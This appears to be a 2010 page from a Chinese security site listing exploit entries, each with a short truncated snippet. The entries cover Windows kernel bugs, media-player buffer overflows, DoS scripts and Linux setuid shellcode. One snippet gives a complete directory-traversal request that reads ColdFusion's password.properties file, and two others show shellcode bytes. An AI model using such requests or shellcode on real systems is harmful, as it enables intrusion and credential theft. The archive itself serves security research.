首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest
  日期:2010-08-18 10:40:21 点击:94 评论:0
Microsoft Windows win32k!GreStretchBltInternal() does not handle src == dest ---------------------------------------------------------------------------- A bitblt (bit block transfer) is used to copy one rectangular region of screen to another, ofte
Microsoft Windows win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks
  日期:2010-08-18 10:39:53 点击:270 评论:0
Microsoft Windows win32k!xxxRealDrawMenuItem() missing HBITMAP bounds checks ---------------------------------------------------------------------------- Microsoft produce two builds of each of thier supported operating system, a checked build and a
Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047)
  日期:2010-08-18 10:39:28 点击:92 评论:0
Microsoft Windows KTM Invalid Free with reused transaction GUID ---------------------------------------------------------------------------- CVE-2010-1889 The Kernel Transaction Manager (ktm) was introduced in Windows Vista and has been included in
Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS
  日期:2010-08-18 10:36:34 点击:137 评论:0
Microsoft Windows nt!NtCreateThread race condition with invalid code segment ---------------------------------------------------------------------------- CVE-2010-1888 Creating a new thread on windows involves passing several structures to NtCreateT
Dlink WBR-2310 Wireless Router DoS exploit
  日期:2010-08-17 10:40:50 点击:240 评论:0
#!/usr/bin/perl use IO::Socket; if (@ARGV 1) { usage(); } $ip = $ARGV[0]; $port = $ARGV[1]; print [+] Sending request...n; $socket = IO::Socket::INET-new( Proto = tcp, PeerAddr = $ip, PeerPort = $port) || die [-] Connection FAILED!n; print $socket
MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH]
  日期:2010-08-17 10:39:40 点击:44 评论:0
# Exploit Title: MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH] # Date: August 17, 2010 # Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) # Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html # Version: 4.9
MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit
  日期:2010-08-17 10:38:59 点击:39 评论:0
# Exploit Title: MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit # Date: August 17, 2010 # Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) # Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html # Version: 4.9.0.006 #
123 Flashchat version 7.8 Multiple Remote Vulnerabilities
  日期:2010-08-17 10:38:07 点击:100 评论:0
|------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __
linux/x86 setuid(0) && execve(/bin/sh,0,0) shellcode 27 bytes
  日期:2010-08-16 11:23:43 点击:63 评论:0
#Special Thanks Inj3ct0r Exploit DataBase #I Love Inj3ct0r.Com #include stdio.h const char sc[]= x31xdb //xor ebx,ebx x8dx43x17 //LEA eax,[ebx + 0x17] /LEA is FASTER than push/pop! x99 //cdq xcdx80 //int 80 //setuid(0) should returns 0 right?
linux/x86 setuid(0) && execve(/usr/sbin/pwunconv,0,0) shellcode 42 bytes
  日期:2010-08-16 11:22:53 点击:114 评论:0
#Special Thanks Inj3ct0r Exploit DataBase #I Love Inj3ct0r.Com #include stdio.h const char sc[]= x31xdb //xor ebx,ebx x8dx43x17 //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop! x99 //cdq xcdx80 //int 80 //setuid(0) shouldn't returns -
Safari for windows Long link DoS
  日期:2010-08-16 11:22:06 点击:62 评论:0
############################################ Safari for windows Long link DoS Vendor URL:http://www.apple.com/safari/ Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html Vendor notified:Yes exploit available: YES Catego
K-Meleon for windows about neterror Stack Overflow DoS
  日期:2010-08-16 11:20:51 点击:64 评论:0
############################################ K-Meleon for windows about:neterror Stack Overflow DoS Vendor URL:http://kmeleon.sourceforge.net/ Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html Vendor notified:Ye
CMSQLite <= 1.2 & CMySQLite <= 1.3.1 Remote Code Execution Exploit
  日期:2010-08-16 11:15:11 点击:52 评论:0
#!/usr/bin/php -q -d short_open_tag=on ? echo CMSQLite = 1.2 CMySQLite = 1.3.1 Remote Code Execution Exploit by BlackHawk hawkgotyou gmail com http://twitter.com/itablackhawk Thanks to rgod for the php code and Natural Killer ; if ($argc4) { echo Us
Rosoft media player 4.4.4 SEH Buffer Overflow
  日期:2010-08-16 11:14:22 点击:34 评论:0
#!/usr/bin/python # ####################################################################### # Title: Rosoft media player 4.4.4 SEH buffer overflow # Date: August 15, 2010 # Author: dijital1 # Original Advisory: http://www.exploit-db.com/exploits/146
Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
  日期:2010-08-16 11:13:37 点击:30 评论:0
# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities # Date: 2010-08-14 # Author: fdisk # Version: 2.6 # Tested on: Windows 2003 Server SP1 en # CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-333
Adobe ColdFusion Directory Traversal Vulnerability
  日期:2010-08-16 11:12:57 点击:75 评论:0
# Working GET request courtesy of carnal0wnage: # http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en # # LLsecurity added another admin page filename: /CFIDE/administrator/enter.
SmartCode ServerX VNC Server ActiveX 1.1.5.0 (scvncsrvx.dll) DoS Exploit
  日期:2010-08-16 11:12:14 点击:110 评论:0
Title: SmartCode ServerX VNC Server ActiveX 1.1.5.0 (scvncsrvx.dll) DoS Exploit Vendor: SmartCode Solutions Product Web Page: htt://www.s-code.com Version Tested: 1.1.5.0 Summary: SmartCode ServerX VNC Server control is a VNC server implemented as a
Xion Player 1.0.125 Stack Buffer Overflow Exploit
  日期:2010-08-16 11:09:09 点击:39 评论:0
#!/usr/bin/python # ####################################################################### # Title: Xion 1.0.125 Stack Buffer Overflow # Date: August 13, 2010 # Author: corelanc0d3r and dijital1 # Grtz to dijital1 : I had a lot of fun working with
dbPowerAmp Audio Player (.m3u ) Denial fo Service
  日期:2010-08-13 10:47:36 点击:37 评论:0
# Author: hamza_hack_dz Black-liondz1 # Software Link: http://www.dbpoweramp.com/bin/dBpowerAMP-r1.exe # Tested on: Windows XP SP 2+sp3 windows 7 windows vista # web:www.sa-hacker.com www.dz4all.com www.h4ckforu.com # Email : hamza_hack_dz@hotmail.co
sonique2 (.pls File) Local Crash PoC
  日期:2010-08-13 10:46:51 点击:46 评论:0
#Author:altbta #Software Link:Download: http://www.softpedia.com/progDownload/Sonique-2-Download-6707.html # # #Version:sonique2 # web:www.xp10.com/xp10 # Email:l_9@hotmail.com print | sonique2 .pls Local Crash |n; print | greetz to :xp10.com/xp10 |
共637页/12733条记录 首页 上一页 [346] [347] [348] 349 [350] [351] [352] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved